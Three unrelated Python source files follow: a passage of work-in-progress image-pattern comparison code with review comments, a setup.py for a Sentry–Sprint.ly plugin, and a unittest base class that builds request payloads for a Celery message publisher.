                derP_.append(derP)  # derP is converted to CderP in comp_slice
                _P = P
                _derP = derP
                downconnect_ = [_derP]  # always 1 inside Py_
            for upconnect in stack.upconnect_:  # store _derP in upconnect to assign upconnected derPs to _derP later
                upconnect.Py_[-1].downconnect_.append(_derP)  # last P of upconnect is connected to 1st derP of current stack
            if stack.upconnect_:
                derP_ += comp_slice_(stack.upconnect_, _derP, _P)  # recursive compare _P to all upconnected Ps
    return derP_
def comp_slice(P, _P, DdX):  # forms vertical derivatives of P params, and conditional ders from norm and DIV comp
    """Compare P to the vertically previous _P; return a Cdert_P.

    :param P: current horizontal slice (lower line)
    :param _P: previous slice (higher line)
    :param DdX: accumulated long-axis curvature (int — rebinding below is
        local, so the caller's accumulator is NOT updated; see note)
    """
    s, x0, G, M, Dx, Dy, L, Dg, Mg = P.sign, P.x0, P.G, P.M, P.Dx, P.Dy, P.L, P.Dg, P.Mg
    # params per comp branch, add angle params, ext: X, new: L,
    # no input I comp in top dert?
    _s, _x0, _G, _M, _Dx, _Dy, _L, _Dg, _Mg = _P.sign, _P.x0, _P.G, _P.M, _P.Dx, _P.Dy, _P.L, _P.Dg, _P.Mg
    '''
    redefine Ps by dx in dert_, rescan dert by input P d_ave_x: skip if not in blob?
    '''
    xn = x0 + L-1; _xn = _x0 + _L-1
    mX = min(xn, _xn) - max(x0, _x0)  # position match = overlap: abs proximity?
    _dX = (xn - L/2) - (_xn - _L/2)   # average position miss?
    dX = abs(x0 - _x0) + abs(xn - _xn)  # offset, or max_L - overlap: abs distance?
    # BUG FIX: ddX was referenced in Pd below but never assigned (NameError);
    # it is the curvature increment that DdX accumulates:
    ddX = dX - _dX
    if dX > ave_dX:  # internal comp is higher-power, else two-input comp not compressive?
        rX = dX / (mX+.001)  # average dist/prox, | prox/dist, | mX / max_L? (currently unused)
        ave_dx = (x0 + (L-1)//2) - (_x0 + (_L-1)//2)  # d_ave_x, median vs. summed (currently unused)
        DdX += ddX  # long axis curvature; NOTE(review): local rebinding only
    # param correlations: dX-> L, ddX-> dL, neutral to Dx: mixed with anti-correlated oDy?
    '''
    if ortho: # estimate params of P locally orthogonal to long axis, maximizing lateral diff and vertical match
        Long axis is a curve, consisting of connections between mid-points of consecutive Ps.
        Ortho virtually rotates each P to make it orthogonal to its connection:
        hyp = hypot(dX, 1)  # long axis increment (vertical distance), to adjust params of orthogonal slice:
        L /= hyp
        # re-orient derivatives by combining them in proportion to their decomposition on new axes:
        Dx = (Dx * hyp + Dy / hyp) / 2  # no / hyp: kernel doesn't matter on P level?
        Dy = (Dy / hyp - Dx * hyp) / 2  # estimated D over vert_L
    '''
    dL = L - _L; mL = min(L, _L)  # L: positions / sign, dderived: magnitude-proportional value
    dM = M - _M; mM = min(M, _M)  # no Mx, My: non-core, lesser and redundant bias?
    dDx = abs(Dx) - abs(_Dx); mDx = min(abs(Dx), abs(_Dx))  # same-sign Dx in vxP
    dDy = Dy - _Dy; mDy = min(Dy, _Dy)  # Dy per sub_P by intra_comp(dx), vs. less vertically specific dI
    # gdert param comparison, if not fPP, values would be 0
    dMg = Mg - _Mg; mMg = min(Mg, _Mg)
    dDg = Dg - _Dg; mDg = min(Dg, _Dg)
    Pd = ddX + dL + dM + dDx + dDy + dMg + dDg  # -> directional dPP, equal-weight params, no rdn?
    Pm = mX + mL + mM + mDx + mDy + mMg + mDg   # -> complementary vPP, rdn *= Pd | Pm rolp?
    # BUG FIX: keyword names must match Cdert_P's declared fields mx/dx
    # (downstream accumulators read dert_P.mx / dert_P.dx):
    dert_P = Cdert_P(Pi=P, Pm=Pm, Pd=Pd, mx=mX, dx=dX, mL=mL, dL=dL, mDx=mDx, dDx=dDx,
                     mDy=mDy, dDy=dDy, mDg=mDg, dDg=dDg, mMg=mMg, dMg=dMg)
    # div_f, nvars
    return dert_P
def comp_slice_old(blob, AveB):  # comp_slice eval per blob, simple stack_
    # NOTE(review): legacy version — calls comp_slice(ortho, P, _P, DdX)
    # with 4 args, but comp_slice above takes (P, _P, DdX); would raise
    # TypeError if executed.  Kept for reference only.
    for stack in blob.stack_:
        if stack.G * stack.Ma - AveB / 10 > 0:  # / 10: ratio AveB to AveS, or not needed?
            # or default (L, Dy, Dx, G) min comp for rotation,
            # primary comp L, the rest is normalized?
            # overlap vs. shift:
            # init cross-dimension div_comp: Dx/Dy, but separate val for comp G, no default G/L?
            # comp -> min Dx/Dy for rotation, min G for comp_g?
            # also default min comp to upconnect_ Ps -> forking / merging PPs -> stack_ per PP!
            # stack.f_stackPP = 1  # scan Py_ -> comp_slice -> form_PP -> 2D PP_: clusters of same-sign dP | mP
            DdX = 0
            if stack.G * (stack.Ly / stack.A) * (abs(stack.Dy) / abs((stack.Dx) + 1)) > ave:  # G_bias * L_bias -> virt.rotation:
                # or default min comp, eval per PP?
                ortho = 1  # estimate params of P orthogonal to long axis at P' y and ave_x, to increase mP
            else:
                ortho = 0
            dert_P_ = []
            _P = stack.Py_[0]
            for P in stack.Py_[1:]:
                dert_P = comp_slice(ortho, P, _P, DdX)
                dert_P_.append(dert_P)
                _P = P
def stack_2_PP_(stack_, PP_):
    '''
    first stack_ call, then sign-unconfirmed upconnect_ calls

    Clusters each root stack's dert_Ps (stack.Py_ after comp_slice_) into
    sign-confirmed sstacks and PPs; a new PP starts whenever the Pm sign
    flips between consecutive dert_Ps.  Appends terminated PPs to PP_.
    '''
    for i, stack in enumerate(stack_):  # bottom-up to follow upconnects
        if stack.downconnect_cnt == 0:  # root stacks were not checked, upconnects always checked
            _dert_P = stack.Py_[0]
            sstack = CSstack(dert_Pi=_dert_P, Py_=[_dert_P])  # sstack: secondary stack, dert_P sign-confirmed
            _dert_P.sstack = sstack
            PP = CPP(sstacki=sstack, sstack_=[sstack])
            sstack.PP = PP  # initialize upward reference
            for dert_P in stack.Py_[1:]:
                if (_dert_P.Pm > 0) != (dert_P.Pm > 0):  # sign flip: terminate sstack + PP
                    stack.sstack_.append(sstack)
                    stack.PP = PP
                    PP_.append(PP)  # terminate sstack and PP
                    sstack = CSstack(dert_Pi=Cdert_P())  # init sstack
                    PP = CPP(sstacki=sstack, sstack_=[sstack])  # init PP with the initialized sstack
                    sstack.PP = PP
                accum_sstack(sstack, dert_P)  # regardless of termination
                _dert_P = dert_P
            upconnect_2_PP_(stack.upconnect_, PP_, PP)  # form PPs across upconnects
    return PP_
def upconnect_2_PP_(stack_, PP_, iPP):  # terminate, initialize, increment blob PPs: clusters of same-sign mP dert_Ps
    # Extends iPP (the PP open at the top of the downconnected stack)
    # across same-Pm-sign upconnects; terminated PPs are appended to PP_.
    if iPP.in_upconnect_cnt > 0:  # to track connects across function calls
        iPP.in_upconnect_cnt -= 1  # decreased by current upconnect
    upconnect_ = []
    isstack = iPP.sstack_[-1]
    _dert_P = isstack.Py_[-1]
    for i, stack in enumerate(stack_):  # breadth-first, upconnect_ is not reversed
        dert_P = stack.Py_[0]
        if (_dert_P.Pm > 0) == (dert_P.Pm > 0):  # upconnect has same sign
            # NOTE(review): popping while enumerating skips the element
            # after each pop — TODO confirm intended.
            upconnect_.append(stack_.pop(i))  # separate stack_ into sign-connected stacks: upconnect_, and unconnected stacks: popped stack_
    # iPP may still having non-terminated upconnects in other loops, we need add them instead of reassigning
    iPP.in_upconnect_cnt += len(upconnect_)
    if len(upconnect_) == 1:  # 1 same-sign upconnect per PP
        if not upconnect_[0].sstack_:  # sstack_ is empty until stack is scanned over
            accum_sstack(isstack, _dert_P)  # accumulate the input _dert_P
            PP = iPP  # no difference in single stack
            for dert_P in upconnect_[0].Py_:
                if (_dert_P.Pm > 0) != (dert_P.Pm > 0):  # sign flip: terminate
                    upconnect_[0].sstack_.append(isstack)
                    upconnect_[0].PP = PP
                    PP.in_upconnect_cnt -= 1
                    if PP.in_upconnect_cnt == 0:
                        PP_.append(PP)  # terminate sstack and PP
                    isstack = CSstack(dert_Pi=Cdert_P())  # init empty sstack, then accum_sstack
                    PP = CPP(sstacki=isstack, sstack_=[isstack])
                    isstack.PP = PP
                    # else isstack is not terminated, no need to update connects
                accum_sstack(isstack, dert_P)  # regardless of termination
                _dert_P = dert_P
            upconnect_2_PP_(upconnect_[0].upconnect_, PP_, PP)
        else:
            merge_PP(iPP, upconnect_[0].sstack_[0].PP, PP_)  # merge connected PPs
            iPP.in_upconnect_cnt -= 1
            if iPP.in_upconnect_cnt <= 0:
                PP_.append(iPP)
    elif upconnect_:  # >1 same-sign upconnects per PP
        idert_P = _dert_P  # downconnected dert_P
        confirmed_upconnect_ = []  # same dert_P sign
        for upconnect in upconnect_:  # form PPs across stacks
            sstack = isstack  # downconnected sstack
            PP = iPP  # then redefined per stack
            _dert_P = idert_P
            ffirst = 1  # first dert_P in Py_
            if not upconnect.sstack_:
                for dert_P in upconnect.Py_:
                    if (_dert_P.Pm > 0) != (dert_P.Pm > 0):
                        # accum_PP(upconnect, sstack, PP)  # term. sstack
                        upconnect.sstack_.append(sstack)
                        upconnect.PP = PP
                        # separate iPP termination test
                        if PP is iPP:
                            PP.in_upconnect_cnt -= 1
                            if PP.in_upconnect_cnt == 0:
                                PP_.append(PP)
                        else:  # terminate stack-local PP
                            PP_.append(PP)
                        sstack = CSstack(dert_Pi=Cdert_P())  # init empty PP, regardless of iPP termination
                        PP = CPP(sstacki=sstack, sstack_=[sstack])  # we don't know if PP will fork at stack term
                        sstack.PP = PP
                    accum_sstack(sstack, dert_P)  # regardless of termination
                    if (PP is iPP) and ffirst and ((_dert_P.Pm > 0) == (dert_P.Pm > 0)):
                        confirmed_upconnect_.append(dert_P)  # to access dert_P.sstack
                    _dert_P = dert_P
                    ffirst = 0
                upconnect_2_PP_(upconnect.upconnect_, PP_, PP)
            else:
                merge_PP(iPP, upconnect.sstack_[0].PP, PP_)
                iPP.in_upconnect_cnt -= 1
                if iPP.in_upconnect_cnt <= 0:
                    PP_.append(iPP)
        # after all upconnects are checked:
        if confirmed_upconnect_:  # at least one first (_dert_P.Pm > 0) == (dert_P.Pm > 0) in upconnect_
            if len(confirmed_upconnect_) == 1:  # sstacks merge:
                dert_P = confirmed_upconnect_[0]
                # NOTE(review): merge_sstack is not defined in this chunk —
                # verify it exists elsewhere in the module.
                merge_sstack(iPP.sstack_[-1], dert_P.sstack)
            else:
                for dert_P in confirmed_upconnect_:
                    # iPP is accumulated and isstack is downconnect of new sstack
                    iPP.sstack_[-1].upconnect_.append(dert_P.sstack)
                    dert_P.sstack.downconnect_cnt += 1
    else:
        if iPP.in_upconnect_cnt:
            iPP.in_upconnect_cnt -= 1
        if iPP.in_upconnect_cnt <= 0:  # 0 same-sign upconnects per PP:
            PP_.append(iPP)
    stack_2_PP_(stack_, PP_)  # stack_ now contains only stacks unconnected to isstack
def merge_PP(_PP, PP, PP_):  # merge PP into _PP
    """Absorb PP into _PP: extend sstack_, sum summary params, re-point
    member sstacks, and drop PP from PP_ if present."""
    _PP.sstack_.extend(PP.sstack_)
    param_names = ('Pm', 'Pd', 'mx', 'dx', 'mL', 'dL', 'mDx', 'dDx',
                   'mDy', 'dDy', 'mDg', 'dDg', 'mMg', 'dMg')
    source = PP.sstacki.dert_Pi
    _PP.sstacki.dert_Pi.accumulate(
        **{name: getattr(source, name) for name in param_names})
    for sstack in PP.sstack_:  # update PP reference
        sstack.PP = _PP
    if PP in PP_:
        PP_.remove(PP)  # remove the merged PP
def accum_sstack(sstack, dert_P):  # accumulate dert_P into sstack
    """Fold one dert_P into its sstack: sum params, append to Py_,
    and set the back-reference."""
    param_names = ('Pm', 'Pd', 'mx', 'dx', 'mL', 'dL', 'mDx', 'dDx',
                   'mDy', 'dDy', 'mDg', 'dDg', 'mMg', 'dMg')
    sstack.dert_Pi.accumulate(
        **{name: getattr(dert_P, name) for name in param_names})
    sstack.Py_.append(dert_P)
    dert_P.sstack = sstack  # update sstack reference in dert_P
def accum_PP(stack, sstack, PP):  # accumulate PP
    """Fold an sstack's summed params into PP, register the sstack with
    PP, and (when a stack is given) register both with the stack."""
    param_names = ('Pm', 'Pd', 'mx', 'dx', 'mL', 'dL', 'mDx', 'dDx',
                   'mDy', 'dDy', 'mDg', 'dDg', 'mMg', 'dMg')
    source = sstack.dert_Pi
    PP.sstacki.dert_Pi.accumulate(
        **{name: getattr(source, name) for name in param_names})
    PP.sstack_.append(sstack)
    sstack.PP = PP
    sstack.PP_id = PP.id
    # add sstack to stack
    if stack:
        stack.sstack_.append(sstack)
        stack.PP = PP
def accum_gstack(gsstack, istack, sstack):  # accumulate istack and sstack into stack
    '''
    This looks wrong, accum_nested_stack should be an add-on to accum_sstack
    only called if istack.f_sstack:
    accum_sstack accumulates dert_P into sstack
    # accum_gstack accumulates sstack into gsstack?
    '''
    # NOTE(review): author-flagged as questionable; sstack.unpack() field
    # list below does not match CSstack's declared fields — verify.
    if istack.f_sstack:  # input stack is sstack
        # sstack params
        dert_Pi, mPP_, dPP_, dert_P_, fdiv = sstack.unpack()
        # need to accumulate dert_P params here, from sstack.dert_P params
        # accumulate sstack params
        gsstack.sstack.mPP_.extend(mPP_)
        gsstack.sstack.dPP_.extend(dPP_)
        gsstack.sstack.dert_P_.extend(dert_P_)
        gsstack.sstack.fdiv = fdiv
    # istack params
    I, Dy, Dx, G, M, Dyy, Dyx, Dxy, Dxx, Ga, Ma, A, Ly, x0, xn, y0, Py_, sign, _, _, _, _, _, _, _ = istack.unpack()
    # accumulate istack param into stack_sstack
    gsstack.I += I
    gsstack.Dy += Dy
    gsstack.Dx += Dx
    gsstack.G += G
    gsstack.M += M
    gsstack.Dyy += Dyy
    gsstack.Dyx += Dyx
    gsstack.Dxy += Dxy
    gsstack.Dxx += Dxx
    gsstack.Ga += Ga
    gsstack.Ma += Ma
    gsstack.A += A
    gsstack.Ly += Ly
    # bounding box: min of x0/y0, max of xn
    if gsstack.x0 > x0: gsstack.x0 = x0
    if gsstack.xn < xn: gsstack.xn = xn
    if gsstack.y0 > y0: gsstack.y0 = y0
    gsstack.Py_.extend(Py_)
    gsstack.sign = sign  # sign should be same across istack
'''
Pd and Pm are ds | ms per param summed in P. Primary comparison is by subtraction, div if par * rL compression:
DL * DS > min: must be both, eval per dPP PD, signed? comp d?
- resulting vertically adjacent dPPs and vPPs are evaluated for cross-comparison, to form PPPs and so on
- resulting param derivatives form par_Ps, which are evaluated for der+ and rng+ cross-comparison
| default top+ P level: if PD | PM: add par_Ps: sub_layer, rdn ele_Ps: deeper layer?
aS compute if positive eV (not qD?) = mx + mL -ave? :
aI = I / L; dI = aI - _aI; mI = min(aI, _aI)
aD = D / L; dD = aD - _aD; mD = min(aD, _aD)
aM = M / L; dM = aM - _aM; mM = min(aM, _aM)
d_aS comp if cs D_aS, iter dS - S -> (n, M, diff): var precision or modulo + remainder?
pP_ eval in +vPPs only, per rdn = alt_rdn * fork_rdn * norm_rdn, then cost of adjust for pP_rdn?
eval_div(PP):
if dL * Pm > div_ave: # dL = potential compression by ratio vs diff, or decremental to Pd and incremental to Pm?
rL = L / _L # DIV comp L, SUB comp (summed param * rL) -> scale-independent d, neg if cross-sign:
nDx = Dx * rL; ndDx = nDx - _Dx; nmDx = min(nDx, _Dx) # vs. nI = dI * rL or aI = I / L?
nDy = Dy * rL; ndDy = nDy - _Dy; nmDy = min(nDy, _Dy)
Pnm = mX + nmDx + nmDy # defines norm_mPP, no ndx: single, but nmx is summed
if Pm > Pnm: nmPP_rdn = 1; mPP_rdn = 0 # added to rdn, or diff alt, olp, div rdn?
else: mPP_rdn = 1; nmPP_rdn = 0
Pnd = ddX + ndDx + ndDy # normalized d defines norm_dPP or ndPP
if Pd > Pnd: ndPP_rdn = 1; dPP_rdn = 0 # value = D | nD
else: dPP_rdn = 1; ndPP_rdn = 0
div_f = 1
nvars = Pnm, nmDx, nmDy, mPP_rdn, nmPP_rdn, Pnd, ndDx, ndDy, dPP_rdn, ndPP_rdn
else:
div_f = 0 # DIV comp flag
nvars = 0 # DIV + norm derivatives
'''
def term_PP2(typ, PP):  # eval for orient (as term_blob), incr_comp_slice, scan_par_:
    # Unpack a flat 27-tuple PP; field order must match the producer —
    # TODO confirm against form_PP (not visible in this chunk).
    s, L2, I2, D2, Dy2, M2, My2, G2, Olp2, Py_, PM, PD, Mx, Dx, ML, DL, MI, DI, MD, DD, MDy, DDy, MM, DM, MMy, DMy, nVars = PP
    rdn = Olp2 / L2  # rdn per PP, alt Ps (if not alt PPs) are complete?
    # if G2 * Dx > ave * 9 * rdn and len(Py_) > 2:
    #    PP, norm = orient(PP) # PP norm, rescan relative to parent blob, for incr_comp, comp_sliceP, and:
    if G2 + PM > ave * 99 * rdn and len(Py_) > 2:
        PP = incr_range_comp_slice(typ, PP)  # forming incrementally fuzzy PP
    if G2 + PD > ave * 99 * rdn and len(Py_) > 2:
        PP = incr_deriv_comp_slice(typ, PP)  # forming incrementally higher-derivation PP
    if G2 + PM > ave * 99 * rdn and len(Py_) > 2:  # PM includes results of incr_comp_slice
        PP = scan_params(0, PP)  # forming vpP_ and S_p_ders
    if G2 + PD > ave * 99 * rdn and len(Py_) > 2:  # PD includes results of incr_comp_slice
        PP = scan_params(1, PP)  # forming dpP_ and S_p_ders
    return PP
''' incr_comp() ~ recursive_comp() in line_POC(), with Ps instead of pixels?
with rescan: recursion per p | d (signed): frame(meta_blob | blob | PP)? '''
def incr_range_comp_slice(typ, PP):
    """Incremental-range comp_slice: placeholder, returns PP unchanged."""
    return PP
def incr_deriv_comp_slice(typ, PP):
    """Incremental-derivation comp_slice: placeholder, returns PP unchanged."""
    return PP
def scan_params(typ, PP):  # at term_network, term_blob, or term_PP: + P_ders and nvars?
    '''
    Aves (integer filters) and coefs (ratio filters) per parameter type trigger formation of parameter_Ps,
    after full-blob comp_slice_ sums match and miss per parameter.
    Also coefs per sub_blob from comp_blob_: potential parts of a higher object?

    NOTE(review): work in progress — Pars holds a single accumulator but
    pars_ has 7 entries, so zip() only processes the first; the rebinding
    of Par inside the loops does not write back into Pars (the author's
    own "how to replace Par in Pars_?" comments flag this).
    '''
    P_ = PP[11]
    Pars = [ (0,0,0,[]) ]
    for P in P_:  # repack ders into par_s by parameter type:
        s, ix, x, I, D, Dy, M, My, G, oG, Olp, t2_, Pm, Pd, mx, dx, mL, dL, mI, dI, mD, dD, mDy, dDy, mM, dM, mMy, dMy, div_f, nvars = P
        pars_ = [(x, mx, dx), (len(t2_), mL, dL), (I, mI, dI), (D, mD, dD), (Dy, mDy, dDy), (M, mM, dM), (My, mMy, dMy)]  # no nvars?
        for par, Par in zip(pars_, Pars):  # PP Par (Ip, Mp, Dp, par_) += par (p, mp, dp):
            p, mp, dp = par
            Ip, Mp, Dp, par_ = Par
            Ip += p; Mp += mp; Dp += dp; par_.append((p, mp, dp))
            Par = Ip, Mp, Dp, par_  # how to replace Par in Pars_?
    for Par in Pars:  # select form_par_P -> Par_vP, Par_dP: combined vs. separate: shared access and overlap eval?
        Ip, Mp, Dp, par_ = Par
        if Mp + Dp > ave * 9 * 7 * 2 * 2:  # ave PP * ave par_P rdn * rdn to PP * par_P typ rdn?
            par_vPS, par_dPS = form_par_P(0, par_)
            par_Pf = 1  # flag
        else:
            par_Pf = 0; par_vPS = Ip, Mp, Dp, par_; par_dPS = Ip, Mp, Dp, par_
        Par = par_Pf, par_vPS, par_dPS
        # how to replace Par in Pars_?
    return PP
def form_par_P(typ, param_):  # forming parameter patterns within par_:
    """Cluster one parameter's (p, mp, dp) ders into sign-contiguous
    match patterns (par_vP) and diff patterns (par_dP), summarized in
    par_vPS / par_dPS.

    :param typ: pattern type flag, forwarded to term_par_P
    :param param_: list of (p, mp, dp) tuples; the last element is
        consumed (popped) as the initial parameter
    :return: (par_vPS, par_dPS) summary tuples (IpS, MpS, DpS, par_P_)
    """
    p, mp, dp = param_.pop()  # initial parameter
    # BUG FIX: was `Ip = p, Mp = mp, Dp = dp, p_ = []`, which Python parses
    # as a chained tuple assignment and raises ValueError at runtime;
    # these are four independent initializations:
    Ip = p; Mp = mp; Dp = dp; p_ = []  # Par init
    # NOTE(review): par_vP and par_dP initially share the same p_ list —
    # appends through one alias are visible through the other; confirm intent.
    _vps = 1 if mp > ave * 7 > 0 else 0  # comp cost = ave * 7, or rep cost: n vars per par_P?
    _dps = 1 if dp > 0 else 0
    par_vP = Ip, Mp, Dp, p_  # also sign, typ and par olp: for eval per par_PS?
    par_dP = Ip, Mp, Dp, p_
    par_vPS = 0, 0, 0, []  # IpS, MpS, DpS, par_vP_
    par_dPS = 0, 0, 0, []  # IpS, MpS, DpS, par_dP_
    for par in param_:  # all vars are summed in incr_par_P
        p, mp, dp = par
        vps = 1 if mp > ave * 7 > 0 else 0
        dps = 1 if dp > 0 else 0
        if vps == _vps:  # same match sign: extend current par_vP
            Ip, Mp, Dp, par_ = par_vP
            Ip += p; Mp += mp; Dp += dp; par_.append(par)
            par_vP = Ip, Mp, Dp, par_
        else:  # sign flip: terminate par_vP, fold it into par_vPS
            par_vP = term_par_P(0, par_vP)
            IpS, MpS, DpS, par_vP_ = par_vPS
            IpS += Ip; MpS += Mp; DpS += Dp; par_vP_.append(par_vP)
            par_vPS = IpS, MpS, DpS, par_vP_
            par_vP = 0, 0, 0, []
        if dps == _dps:  # same diff sign: extend current par_dP
            Ip, Mp, Dp, par_ = par_dP
            Ip += p; Mp += mp; Dp += dp; par_.append(par)
            par_dP = Ip, Mp, Dp, par_
        else:  # sign flip: terminate par_dP, fold it into par_dPS
            par_dP = term_par_P(1, par_dP)
            IpS, MpS, DpS, par_dP_ = par_dPS
            IpS += Ip; MpS += Mp; DpS += Dp; par_dP_.append(par_dP)
            # BUG FIX: this assigned par_vPS, clobbering the match-sign
            # summary with diff-sign data; accumulate into par_dPS:
            par_dPS = IpS, MpS, DpS, par_dP_
            par_dP = 0, 0, 0, []
        _vps = vps; _dps = dps
    return par_vPS, par_dPS  # tuples: Ip, Mp, Dp, par_P_, added to Par
# LIDV per dx, L, I, D, M? also alt2_: fork_ alt_ concat, for rdn per PP?
# fpP fb to define vpPs: a_mx = 2; a_mw = 2; a_mI = 256; a_mD = 128; a_mM = 128
def term_par_P(typ, par_P):  # from form_par_P: eval for orient, re_comp? or folded?
    """Terminate a parameter pattern: placeholder, returns par_P unchanged."""
    return par_P
def scan_par_P(typ, par_P_):  # from term_PP, folded in scan_par_? pP rdn per vertical overlap?
    """Scan parameter patterns: placeholder, returns par_P_ unchanged."""
    return par_P_
def comp_slice_P(par_P, _par_P):  # with/out orient, from scan_pP_
    """Compare two parameter patterns: placeholder, returns par_P unchanged."""
    return par_P
def scan_PP_(PP_):  # within a blob, also within a segment?
    """Scan PPs of a blob: placeholder, returns PP_ unchanged."""
    return PP_
def comp_sliceP(PP, _PP):  # compares PPs within a blob | segment, -> forking PPP_: very rare?
    """Compare two PPs: placeholder, returns PP unchanged."""
    return PP
'''
horiz_dim_val = ave_Lx - |Dx| / 2 # input res and coord res are adjusted so mag approximates predictive value,
vertical_dim_val = Ly - |Dy| / 2 # or proj M = M - (|D| / M) / 2: no neg?
core params G and M represent value of all others, no max Pm = L + |V| + |Dx| + |Dy|: redundant and coef-filtered?
no * Ave_blob / Ga: angle match rate, already represented by hforks' position + mag' V+G -> comp( d | ortho_d)?
eval per blob, too expensive for seg? no abs_Dx, abs_Dy for comp dert eval: mostly redundant?
colors will be defined as color / sum-of-colors, color Ps are defined within sum_Ps: reflection object?
relative colors may match across reflecting objects, forming color | lighting objects?
comp between color patterns within an object: segmentation?
''' |
#!/usr/bin/env python
"""
sentry-sprintly
===============
An extension for Sentry which integrates with Sprint.ly.
:copyright: (c) 2014 by Matt Robenolt, see AUTHORS for more details.
:license: BSD, see LICENSE for more details.
"""
from setuptools import setup, find_packages
# Runtime dependencies: the plugin only requires a Sentry installation.
install_requires = [
    'sentry>=5.0.0',
]

setup(
    name='sentry-sprintly',
    version='0.1.5',
    author='Matt Robenolt',
    author_email='[email protected]',
    url='http://github.com/mattrobenolt/sentry-sprintly',
    description='A Sentry extension which integrates with Sprint.ly',
    long_description=__doc__,  # reuse the module docstring for PyPI
    license='BSD',
    packages=find_packages(exclude=['tests']),
    zip_safe=False,
    install_requires=install_requires,
    include_package_data=True,
    # Register the package as both a Sentry app and a Sentry plugin so
    # Sentry discovers SprintlyPlugin at startup.
    entry_points={
        'sentry.apps': [
            'sprintly = sentry_sprintly',
        ],
        'sentry.plugins': [
            'sprintly = sentry_sprintly.plugin:SprintlyPlugin',
        ]
    },
    classifiers=[
        'Framework :: Django',
        'Intended Audience :: Developers',
        'Intended Audience :: System Administrators',
        'Operating System :: OS Independent',
        'Topic :: Software Development'
    ],
)
|
import datetime
import json
import uuid
import unittest
import pandas as pd
from spylunking.log.setup_logging import test_logger
from celery_connectors.publisher import Publisher
log = test_logger(name='test_base')
class BaseTestCase(unittest.TestCase):
    """Shared fixture for publisher/broker tests.

    Provides an in-memory broker configuration, a lazily created
    ``Publisher`` and helpers that load train/predict request payloads
    (plus their ``predict_rows``) from JSON/CSV files on disk.
    """

    def setUp(self):
        """Create a unique test name and default broker settings."""
        self.name = "testing_{}".format(
            str(uuid.uuid4()))
        self.broker_url = "memory://localhost/"
        self.ssl_options = None
        self.serializer = "json"
        self.train_exchange_name = "webapp.train.requests"
        self.train_routing_key = "webapp.train.requests"
        self.train_queue_name = "webapp.train.requests"
        self.predict_exchange_name = "webapp.predict.requests"
        self.predict_routing_key = "webapp.predict.requests"
        self.predict_queue_name = "webapp.predict.requests"
        self.pub = None
    # end of setUp

    def get_broker(self):
        """Return the broker url for this test."""
        return self.broker_url
    # end of get_broker

    def get_ssl_options(self):
        """Return the ssl options for this test (``None`` by default)."""
        return self.ssl_options
    # end of get_ssl_options

    def get_publisher(self, broker_url=None, ssl_options=None):
        """Create (once) and return the cached ``Publisher``.

        :param broker_url: broker url - NOTE(review): currently ignored
            in favor of ``self.broker_url``; confirm callers expect that
        :param ssl_options: ssl options - NOTE(review): currently
            ignored in favor of ``self.ssl_options``
        """
        if self.pub:
            return self.pub
        self.pub = Publisher(
            name=self.name,
            auth_url=self.broker_url,
            ssl_options=self.ssl_options)
        return self.pub
    # end of get_publisher

    def publish(
            self,
            body=None,
            exchange=None,
            routing_key=None,
            queue=None,
            serializer="json",
            retry=True,
            silent=True):
        """Publish ``body`` to the broker.

        Falls back to the train exchange/routing key/queue when the
        corresponding argument is falsy.

        :param body: message payload
        :param exchange: exchange name (default: train exchange)
        :param routing_key: routing key (default: train routing key)
        :param queue: queue name (default: train queue)
        :param serializer: kombu serializer name
        :param retry: retry publishing on failure
        :param silent: unused; kept for call compatibility
        """
        use_exchange = exchange or self.train_exchange_name
        use_routing_key = routing_key or self.train_routing_key
        use_queue = queue or self.train_queue_name

        log.info(("Sending msg={} "
                  "ex={} rk={}")
                 .format(
                     body,
                     use_exchange,
                     use_routing_key))

        # NOTE(review): assumes get_publisher() has already been called;
        # self.pub is None straight after setUp.
        self.pub.publish(
            body=body,
            exchange=use_exchange,
            routing_key=use_routing_key,
            queue=use_queue,
            serializer=serializer,
            retry=retry)
    # end of publish

    def _load_request_with_predict_rows(self, data_file):
        """Load a request payload and attach its ``predict_rows``.

        Shared implementation for the train/predict request builders
        below (the original three methods were identical copies).

        :param data_file: path to the request json file; its
            ``dataset`` key must point at a readable csv file
        """
        with open(data_file, "r") as cur_file:
            body = json.loads(cur_file.read())

        # stamp the request with the build time
        body["created"] = datetime.datetime.now().isoformat()

        log.info("loading predict_rows")
        predict_rows_df = pd.read_csv(body["dataset"])
        predict_rows = []
        for _, org_row in predict_rows_df.iterrows():
            new_row = json.loads(org_row.to_json())
            new_row["idx"] = len(predict_rows) + 1
            predict_rows.append(new_row)
        body["predict_rows"] = pd.DataFrame(predict_rows).to_json()

        log.info(("using predict_rows={}")
                 .format(
                     len(predict_rows)))
        return body
    # end of _load_request_with_predict_rows

    def build_train_antinex_request(
            self,
            data_file=("./training/"
                       "django-antinex-simple.json")):
        """Build a train request payload from ``data_file``.

        :param data_file: train and predict request
        """
        return self._load_request_with_predict_rows(data_file)
    # end of build_train_antinex_request

    def build_predict_antinex_request(
            self,
            data_file=("./training/"
                       "django-antinex-simple.json")):
        """Build a predict request payload from ``data_file``.

        :param data_file: predict request
        """
        return self._load_request_with_predict_rows(data_file)
    # end of build_predict_antinex_request

    def build_predict_scaler_antinex_request(
            self,
            data_file=("./training/"
                       "scaler-django-antinex-simple.json")):
        """Build a predict request (scaler dataset) from ``data_file``.

        :param data_file: predict request
        """
        return self._load_request_with_predict_rows(data_file)
    # end of build_predict_scaler_antinex_request

    def build_predict_rows_from_dataset(
            self,
            data_file=("./training/"
                       "scaler-django-antinex-simple.json"),
            num_rows_at_bottom=2):
        """Build a predict request from the dataset's trailing rows.

        :param data_file: predict request json file
        :param num_rows_at_bottom: how many trailing csv rows to keep
        """
        with open(data_file, "r") as cur_file:
            body = json.loads(cur_file.read())

        body["created"] = datetime.datetime.now().isoformat()

        log.info("loading predict_rows")
        predict_rows_df = pd.read_csv(body["dataset"])
        predict_rows = []
        use_start_idx = num_rows_at_bottom
        if use_start_idx > 0:
            # negative index keeps the N rows at the bottom of the file
            use_start_idx = -1 * use_start_idx
        for idx, org_row in predict_rows_df.iloc[use_start_idx:].iterrows():
            new_row = json.loads(org_row.to_json())
            new_row["idx"] = len(predict_rows) + 1
            new_row["_dataset_index"] = idx
            predict_rows.append(new_row)
        body["predict_rows"] = pd.DataFrame(predict_rows).to_json()

        log.info(("using predict_rows={}")
                 .format(
                     len(predict_rows)))
        return body
    # end of build_predict_rows_from_dataset

    def build_regression_train_request(
            self,
            data_file=("./tests/train/"
                       "regression.json")):
        """Load a regression train request payload from ``data_file``.

        :param data_file: train and predict request
        """
        with open(data_file, "r") as cur_file:
            body = json.loads(cur_file.read())
        return body
